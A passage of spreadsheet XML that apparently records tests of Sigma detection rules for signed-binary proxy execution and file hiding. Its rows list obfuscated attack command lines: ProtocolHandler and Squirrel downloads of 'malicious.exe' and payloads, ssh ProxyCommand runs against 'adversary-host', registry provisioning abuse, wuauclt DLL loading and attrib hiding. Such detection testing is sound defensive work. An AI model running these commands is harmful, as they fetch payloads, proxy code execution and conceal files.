      <c r="C3742" s="44" t="inlineStr">
        <is>
          <t>XBAP Execution From Uncommon Locations Via PresentationHost.EXE</t>
        </is>
      </c>
      <c r="D3742" s="44" t="inlineStr">
        <is>
          <t>d22e2925-cfd8-463f-96f6-89cec9d9bc5f</t>
        </is>
      </c>
      <c r="E3742" s="44" t="inlineStr">
        <is>
          <t>PresentationHost .xbap</t>
        </is>
      </c>
      <c r="F3742" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3742" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3742" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3742" s="44" t="inlineStr">
        <is>
          <t>XBAP Execution From Uncommon Locations Via PresentationHost.EXE (d22e2925-cfd8-463f-96f6-89cec9d9bc5f)</t>
        </is>
      </c>
      <c r="J3742" s="44" t="n"/>
      <c r="K3742" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3743" ht="15.75" customHeight="1" s="42">
      <c r="A3743" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3743" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_presentationhost_uncommon_location_exec</t>
        </is>
      </c>
      <c r="C3743" s="44" t="inlineStr">
        <is>
          <t>XBAP Execution From Uncommon Locations Via PresentationHost.EXE</t>
        </is>
      </c>
      <c r="D3743" s="44" t="inlineStr">
        <is>
          <t>d22e2925-cfd8-463f-96f6-89cec9d9bc5f</t>
        </is>
      </c>
      <c r="E3743" s="44" t="inlineStr">
        <is>
          <t>%COMSPEC% /c PresentationHost.exe .xbap</t>
        </is>
      </c>
      <c r="F3743" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3743" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3743" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3743" s="44" t="inlineStr">
        <is>
          <t>XBAP Execution From Uncommon Locations Via PresentationHost.EXE (d22e2925-cfd8-463f-96f6-89cec9d9bc5f)</t>
        </is>
      </c>
      <c r="J3743" s="44" t="n"/>
      <c r="K3743" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3744" ht="15.75" customHeight="1" s="42">
      <c r="A3744" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3744" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_protocolhandler_download</t>
        </is>
      </c>
      <c r="C3744" s="44" t="inlineStr">
        <is>
          <t>File Download Using ProtocolHandler.exe</t>
        </is>
      </c>
      <c r="D3744" s="44" t="inlineStr">
        <is>
          <t>104cdb48-a7a8-4ca7-a453-32942c6e5dcb</t>
        </is>
      </c>
      <c r="E3744" s="44" t="inlineStr">
        <is>
          <t>ProtocolHandler.exe https:\\\\/\\\/example.com/malicious.exe</t>
        </is>
      </c>
      <c r="F3744" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3744" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3744" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3744" s="44" t="n"/>
      <c r="J3744" s="44" t="n"/>
      <c r="K3744" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3745" ht="15.75" customHeight="1" s="42">
      <c r="A3745" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3745" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_protocolhandler_download</t>
        </is>
      </c>
      <c r="C3745" s="44" t="inlineStr">
        <is>
          <t>File Download Using ProtocolHandler.exe</t>
        </is>
      </c>
      <c r="D3745" s="44" t="inlineStr">
        <is>
          <t>104cdb48-a7a8-4ca7-a453-32942c6e5dcb</t>
        </is>
      </c>
      <c r="E3745" s="44" t="inlineStr">
        <is>
          <t>ProtocolHandler.exe -url https://example.com/malicious.exe</t>
        </is>
      </c>
      <c r="F3745" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3745" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3745" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3745" s="44" t="n"/>
      <c r="J3745" s="44" t="n"/>
      <c r="K3745" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3746" ht="15.75" customHeight="1" s="42">
      <c r="A3746" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3746" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_provlaunch_provisioning_command</t>
        </is>
      </c>
      <c r="C3746" s="44" t="inlineStr">
        <is>
          <t>Potential Provisioning Registry Key Abuse For Binary Proxy Execution</t>
        </is>
      </c>
      <c r="D3746" s="44" t="inlineStr">
        <is>
          <t>2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25</t>
        </is>
      </c>
      <c r="E3746" s="44" t="inlineStr">
        <is>
          <t>reg.exe add "HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1" /v altitude /t REG_DWORD /d 0</t>
        </is>
      </c>
      <c r="F3746" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3746" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3746" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3746" s="44" t="inlineStr">
        <is>
          <t>Potential Provisioning Registry Key Abuse For Binary Proxy Execution (2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25); Potential Provisioning Registry Key Abuse For Binary Proxy Execution (2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25)</t>
        </is>
      </c>
      <c r="J3746" s="44" t="n"/>
      <c r="K3746" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3747" ht="15.75" customHeight="1" s="42">
      <c r="A3747" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3747" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_provlaunch_provisioning_command</t>
        </is>
      </c>
      <c r="C3747" s="44" t="inlineStr">
        <is>
          <t>Potential Provisioning Registry Key Abuse For Binary Proxy Execution</t>
        </is>
      </c>
      <c r="D3747" s="44" t="inlineStr">
        <is>
          <t>2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25</t>
        </is>
      </c>
      <c r="E3747" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Pro^visioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe"</t>
        </is>
      </c>
      <c r="F3747" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3747" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3747" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3747" s="44" t="inlineStr">
        <is>
          <t>Potential Provisioning Registry Key Abuse For Binary Proxy Execution (2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25)</t>
        </is>
      </c>
      <c r="J3747" s="44" t="n"/>
      <c r="K3747" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3748" ht="15.75" customHeight="1" s="42">
      <c r="A3748" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3748" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_squirrel_download</t>
        </is>
      </c>
      <c r="C3748" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via Squirrel.EXE</t>
        </is>
      </c>
      <c r="D3748" s="44" t="inlineStr">
        <is>
          <t>1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c</t>
        </is>
      </c>
      <c r="E3748" s="44" t="inlineStr">
        <is>
          <t>Update.exe --download	http://example.com/payload.txt</t>
        </is>
      </c>
      <c r="F3748" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3748" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3748" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3748" s="44" t="n"/>
      <c r="J3748" s="44" t="n"/>
      <c r="K3748" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3749" ht="15.75" customHeight="1" s="42">
      <c r="A3749" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3749" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_squirrel_download</t>
        </is>
      </c>
      <c r="C3749" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via Squirrel.EXE</t>
        </is>
      </c>
      <c r="D3749" s="44" t="inlineStr">
        <is>
          <t>1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c</t>
        </is>
      </c>
      <c r="E3749" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c Update.exe --downl^oad http://example.com/payload.txt</t>
        </is>
      </c>
      <c r="F3749" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3749" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3749" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3749" s="44" t="n"/>
      <c r="J3749" s="44" t="n"/>
      <c r="K3749" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3750" ht="15.75" customHeight="1" s="42">
      <c r="A3750" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3750" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_squirrel_download</t>
        </is>
      </c>
      <c r="C3750" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via Squirrel.EXE</t>
        </is>
      </c>
      <c r="D3750" s="44" t="inlineStr">
        <is>
          <t>1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c</t>
        </is>
      </c>
      <c r="E3750" s="44" t="inlineStr">
        <is>
          <t>Update.exe --download HttP://example.com/payload.txt</t>
        </is>
      </c>
      <c r="F3750" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3750" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3750" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3750" s="44" t="n"/>
      <c r="J3750" s="44" t="n"/>
      <c r="K3750" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3751" ht="15.75" customHeight="1" s="42">
      <c r="A3751" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3751" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_squirrel_proxy_execution</t>
        </is>
      </c>
      <c r="C3751" s="44" t="inlineStr">
        <is>
          <t>Process Proxy Execution Via Squirrel.EXE</t>
        </is>
      </c>
      <c r="D3751" s="44" t="inlineStr">
        <is>
          <t>45239e6a-b035-4aaf-b339-8ad379fcb67e</t>
        </is>
      </c>
      <c r="E3751" s="44" t="inlineStr">
        <is>
          <t>Update.exe "--processStart" calc.exe</t>
        </is>
      </c>
      <c r="F3751" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3751" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3751" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3751" s="44" t="n"/>
      <c r="J3751" s="44" t="n"/>
      <c r="K3751" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3752" ht="15.75" customHeight="1" s="42">
      <c r="A3752" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3752" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_squirrel_proxy_execution</t>
        </is>
      </c>
      <c r="C3752" s="44" t="inlineStr">
        <is>
          <t>Process Proxy Execution Via Squirrel.EXE</t>
        </is>
      </c>
      <c r="D3752" s="44" t="inlineStr">
        <is>
          <t>45239e6a-b035-4aaf-b339-8ad379fcb67e</t>
        </is>
      </c>
      <c r="E3752" s="44" t="inlineStr">
        <is>
          <t>Update.exe --processStart	calc.exe</t>
        </is>
      </c>
      <c r="F3752" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3752" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3752" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3752" s="44" t="n"/>
      <c r="J3752" s="44" t="n"/>
      <c r="K3752" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3753" ht="15.75" customHeight="1" s="42">
      <c r="A3753" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3753" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_squirrel_proxy_execution</t>
        </is>
      </c>
      <c r="C3753" s="44" t="inlineStr">
        <is>
          <t>Process Proxy Execution Via Squirrel.EXE</t>
        </is>
      </c>
      <c r="D3753" s="44" t="inlineStr">
        <is>
          <t>45239e6a-b035-4aaf-b339-8ad379fcb67e</t>
        </is>
      </c>
      <c r="E3753" s="44" t="inlineStr">
        <is>
          <t>Update.exe --PROCESSSTART calc.exe</t>
        </is>
      </c>
      <c r="F3753" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3753" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3753" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3753" s="44" t="n"/>
      <c r="J3753" s="44" t="n"/>
      <c r="K3753" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3754" ht="15.75" customHeight="1" s="42">
      <c r="A3754" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3754" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_proxy_execution</t>
        </is>
      </c>
      <c r="C3754" s="44" t="inlineStr">
        <is>
          <t>Program Executed Using Proxy/Local Command Via SSH.EXE</t>
        </is>
      </c>
      <c r="D3754" s="44" t="inlineStr">
        <is>
          <t>7d6d30b8-5b91-4b90-a891-46cccaf29598</t>
        </is>
      </c>
      <c r="E3754" s="44" t="inlineStr">
        <is>
          <t>"C:\WINDOWS\System32\OpenSSH\ssh.exe" -o "Proxy"Command="whoami" adversary-host</t>
        </is>
      </c>
      <c r="F3754" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3754" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3754" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3754" s="44" t="n"/>
      <c r="J3754" s="44" t="n"/>
      <c r="K3754" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3755" ht="15.75" customHeight="1" s="42">
      <c r="A3755" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3755" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_proxy_execution</t>
        </is>
      </c>
      <c r="C3755" s="44" t="inlineStr">
        <is>
          <t>Program Executed Using Proxy/Local Command Via SSH.EXE</t>
        </is>
      </c>
      <c r="D3755" s="44" t="inlineStr">
        <is>
          <t>7d6d30b8-5b91-4b90-a891-46cccaf29598</t>
        </is>
      </c>
      <c r="E3755" s="44" t="inlineStr">
        <is>
          <t>"C:\WINDOWS\System32\OpenSSH\ssh.exe" -o PermitLocalCommand=yes -o Local""Command="calc.exe" adversary-host</t>
        </is>
      </c>
      <c r="F3755" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3755" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3755" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3755" s="44" t="n"/>
      <c r="J3755" s="44" t="n"/>
      <c r="K3755" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3756" ht="15.75" customHeight="1" s="42">
      <c r="A3756" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3756" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_proxy_execution</t>
        </is>
      </c>
      <c r="C3756" s="44" t="inlineStr">
        <is>
          <t>Program Executed Using Proxy/Local Command Via SSH.EXE</t>
        </is>
      </c>
      <c r="D3756" s="44" t="inlineStr">
        <is>
          <t>7d6d30b8-5b91-4b90-a891-46cccaf29598</t>
        </is>
      </c>
      <c r="E3756" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\WINDOWS\System32\OpenSSH\ssh.exe" -o ProxyC^ommand="whoami" adversary-host</t>
        </is>
      </c>
      <c r="F3756" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3756" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3756" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3756" s="44" t="n"/>
      <c r="J3756" s="44" t="n"/>
      <c r="K3756" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3757" ht="15.75" customHeight="1" s="42">
      <c r="A3757" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3757" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_proxy_execution</t>
        </is>
      </c>
      <c r="C3757" s="44" t="inlineStr">
        <is>
          <t>Program Executed Using Proxy/Local Command Via SSH.EXE</t>
        </is>
      </c>
      <c r="D3757" s="44" t="inlineStr">
        <is>
          <t>7d6d30b8-5b91-4b90-a891-46cccaf29598</t>
        </is>
      </c>
      <c r="E3757" s="44" t="inlineStr">
        <is>
          <t>"C:\WINDOWS\System32\OpenSSH\ssh.exe" -o proxycommand="whoami" adversary-host</t>
        </is>
      </c>
      <c r="F3757" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3757" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3757" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3757" s="44" t="n"/>
      <c r="J3757" s="44" t="n"/>
      <c r="K3757" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3758" ht="15.75" customHeight="1" s="42">
      <c r="A3758" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3758" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_ms_appinstaller_download</t>
        </is>
      </c>
      <c r="C3758" s="44" t="inlineStr">
        <is>
          <t>Potential File Download Via MS-AppInstaller Protocol Handler</t>
        </is>
      </c>
      <c r="D3758" s="44" t="inlineStr">
        <is>
          <t>180c7c5c-d64b-4a63-86e9-68910451bc8b</t>
        </is>
      </c>
      <c r="E3758" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "start ms-appinstaller://?source^=http://example.com/package.appinstaller"</t>
        </is>
      </c>
      <c r="F3758" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3758" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3758" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3758" s="44" t="n"/>
      <c r="J3758" s="44" t="n"/>
      <c r="K3758" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3759" ht="15.75" customHeight="1" s="42">
      <c r="A3759" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3759" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_ms_appinstaller_download</t>
        </is>
      </c>
      <c r="C3759" s="44" t="inlineStr">
        <is>
          <t>Potential File Download Via MS-AppInstaller Protocol Handler</t>
        </is>
      </c>
      <c r="D3759" s="44" t="inlineStr">
        <is>
          <t>180c7c5c-d64b-4a63-86e9-68910451bc8b</t>
        </is>
      </c>
      <c r="E3759" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set PROTOCOL=ms-appinstaller://?source=&amp;&amp; call start %PROTOCOL%http://example.com/package.appinstaller"</t>
        </is>
      </c>
      <c r="F3759" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3759" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3759" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3759" s="44" t="inlineStr">
        <is>
          <t>Potential File Download Via MS-AppInstaller Protocol Handler (180c7c5c-d64b-4a63-86e9-68910451bc8b)</t>
        </is>
      </c>
      <c r="J3759" s="44" t="n"/>
      <c r="K3759" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3760" ht="15.75" customHeight="1" s="42">
      <c r="A3760" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3760" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_vsdiagnostics_execution_proxy</t>
        </is>
      </c>
      <c r="C3760" s="44" t="inlineStr">
        <is>
          <t>Potential Binary Proxy Execution Via VSDiagnostics.EXE</t>
        </is>
      </c>
      <c r="D3760" s="44" t="inlineStr">
        <is>
          <t>ac1c92b4-ac81-405a-9978-4604d78cc47e</t>
        </is>
      </c>
      <c r="E3760" s="44" t="inlineStr">
        <is>
          <t>VSDiagnostics.exe "start" /launch:C:\Windows\System32\calc.exe</t>
        </is>
      </c>
      <c r="F3760" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3760" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3760" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3760" s="44" t="n"/>
      <c r="J3760" s="44" t="n"/>
      <c r="K3760" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3761" ht="15.75" customHeight="1" s="42">
      <c r="A3761" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3761" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_vsdiagnostics_execution_proxy</t>
        </is>
      </c>
      <c r="C3761" s="44" t="inlineStr">
        <is>
          <t>Potential Binary Proxy Execution Via VSDiagnostics.EXE</t>
        </is>
      </c>
      <c r="D3761" s="44" t="inlineStr">
        <is>
          <t>ac1c92b4-ac81-405a-9978-4604d78cc47e</t>
        </is>
      </c>
      <c r="E3761" s="44" t="inlineStr">
        <is>
          <t>VSDiagnostics.exe start "/launch:C:\Windows\System32\calc.exe"</t>
        </is>
      </c>
      <c r="F3761" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3761" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3761" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3761" s="44" t="n"/>
      <c r="J3761" s="44" t="n"/>
      <c r="K3761" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3762" ht="15.75" customHeight="1" s="42">
      <c r="A3762" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3762" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wuauclt_dll_loading</t>
        </is>
      </c>
      <c r="C3762" s="44" t="inlineStr">
        <is>
          <t>Proxy Execution Via Wuauclt.EXE</t>
        </is>
      </c>
      <c r="D3762" s="44" t="inlineStr">
        <is>
          <t>af77cf95-c469-471c-b6a0-946c685c4798</t>
        </is>
      </c>
      <c r="E3762" s="44" t="inlineStr">
        <is>
          <t>wuauclt.exe /UpdateDeploymentProvider "C:\AtomicRedTeam\atomics\T1218\bin\calc.dll" "/RunHandlerComServer"</t>
        </is>
      </c>
      <c r="F3762" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3762" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3762" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3762" s="44" t="inlineStr">
        <is>
          <t>Proxy Execution Via Wuauclt.EXE (af77cf95-c469-471c-b6a0-946c685c4798)</t>
        </is>
      </c>
      <c r="J3762" s="44" t="n"/>
      <c r="K3762" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3763" ht="15.75" customHeight="1" s="42">
      <c r="A3763" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3763" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wuauclt_dll_loading</t>
        </is>
      </c>
      <c r="C3763" s="44" t="inlineStr">
        <is>
          <t>Proxy Execution Via Wuauclt.EXE</t>
        </is>
      </c>
      <c r="D3763" s="44" t="inlineStr">
        <is>
          <t>af77cf95-c469-471c-b6a0-946c685c4798</t>
        </is>
      </c>
      <c r="E3763" s="44" t="inlineStr">
        <is>
          <t>wuauclt.exe -UpdateDeploymentProvider "C:\AtomicRedTeam\atomics\T1218\bin\calc.dll" -RunHandlerComServer</t>
        </is>
      </c>
      <c r="F3763" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3763" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3763" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3763" s="44" t="inlineStr">
        <is>
          <t>Proxy Execution Via Wuauclt.EXE (af77cf95-c469-471c-b6a0-946c685c4798)</t>
        </is>
      </c>
      <c r="J3763" s="44" t="n"/>
      <c r="K3763" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3764" ht="15.75" customHeight="1" s="42">
      <c r="A3764" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3764" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wuauclt_dll_loading</t>
        </is>
      </c>
      <c r="C3764" s="44" t="inlineStr">
        <is>
          <t>Proxy Execution Via Wuauclt.EXE</t>
        </is>
      </c>
      <c r="D3764" s="44" t="inlineStr">
        <is>
          <t>af77cf95-c469-471c-b6a0-946c685c4798</t>
        </is>
      </c>
      <c r="E3764" s="44" t="inlineStr">
        <is>
          <t>wuauclt.exe /RunHandlerComServer /UpdateDeploymentProvider "C:\AtomicRedTeam\atomics\T1218\bin\calc.dll"</t>
        </is>
      </c>
      <c r="F3764" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3764" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3764" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3764" s="44" t="inlineStr">
        <is>
          <t>Proxy Execution Via Wuauclt.EXE (af77cf95-c469-471c-b6a0-946c685c4798)</t>
        </is>
      </c>
      <c r="J3764" s="44" t="n"/>
      <c r="K3764" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3765" ht="15.75" customHeight="1" s="42">
      <c r="A3765" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3765" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wuauclt_dll_loading</t>
        </is>
      </c>
      <c r="C3765" s="44" t="inlineStr">
        <is>
          <t>Proxy Execution Via Wuauclt.EXE</t>
        </is>
      </c>
      <c r="D3765" s="44" t="inlineStr">
        <is>
          <t>af77cf95-c469-471c-b6a0-946c685c4798</t>
        </is>
      </c>
      <c r="E3765" s="44" t="inlineStr">
        <is>
          <t>wuauclt.exe /UpdateDeploymentProvider "C:\AtomicRedTeam\atomics\T1218\bin\calc.dll" /RunHandlerComServer wuaueng.dll</t>
        </is>
      </c>
      <c r="F3765" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3765" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3765" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3765" s="44" t="inlineStr">
        <is>
          <t>Proxy Execution Via Wuauclt.EXE (af77cf95-c469-471c-b6a0-946c685c4798)</t>
        </is>
      </c>
      <c r="J3765" s="44" t="n"/>
      <c r="K3765" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3766" ht="15.75" customHeight="1" s="42">
      <c r="A3766" s="44" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B3766" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_attrib_hiding_files</t>
        </is>
      </c>
      <c r="C3766" s="44" t="inlineStr">
        <is>
          <t>Hiding Files with Attrib.exe</t>
        </is>
      </c>
      <c r="D3766" s="44" t="inlineStr">
        <is>
          <t>4281cb20-2994-4580-aa63-c8b86d019934</t>
        </is>
      </c>
      <c r="E3766" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c attrib.exe +^h C:\Users\thaim\AppData\Local\Temp\T1564.001.txt</t>
        </is>
      </c>
      <c r="F3766" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3766" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3766" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3766" s="44" t="inlineStr">
        <is>
          <t>Hiding Files with Attrib.exe (4281cb20-2994-4580-aa63-c8b86d019934)</t>
        </is>
      </c>
      <c r="J3766" s="44" t="n"/>
      <c r="K3766" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3767" ht="15.75" customHeight="1" s="42">
      <c r="A3767" s="44" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B3767" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_attrib_hiding_files</t>
        </is>
      </c>
      <c r="C3767" s="44" t="inlineStr">
        <is>
          <t>Hiding Files with Attrib.exe</t>
        </is>
      </c>
      <c r="D3767" s="44" t="inlineStr">
        <is>
          <t>4281cb20-2994-4580-aa63-c8b86d019934</t>
        </is>
      </c>
      <c r="E3767" s="44" t="inlineStr">
        <is>
          <t>attrib.exe +r +s +h C:\Users\thaim\AppData\Local\Temp\T1564.001.txt</t>
        </is>
      </c>
      <c r="F3767" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3767" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3767" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3767" s="44" t="inlineStr">
        <is>
          <t>Set Suspicious Files as System Files Using Attrib.EXE (efec536f-72e8-4656-8960-5e85d091345b); Hiding Files with Attrib.exe (4281cb20-2994-4580-aa63-c8b86d019934)</t>
        </is>
      </c>
      <c r="J3767" s="44" t="n"/>
      <c r="K3767" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3768" ht="15.75" customHeight="1" s="42">
      <c r="A3768" s="44" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B3768" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_attrib_system_susp_paths</t>
        </is>
      </c>
      <c r="C3768" s="44" t="inlineStr">
        <is>
          <t>Set Suspicious Files as System Files Using Attrib.EXE</t>
        </is>
      </c>
      <c r="D3768" s="44" t="inlineStr">
        <is>
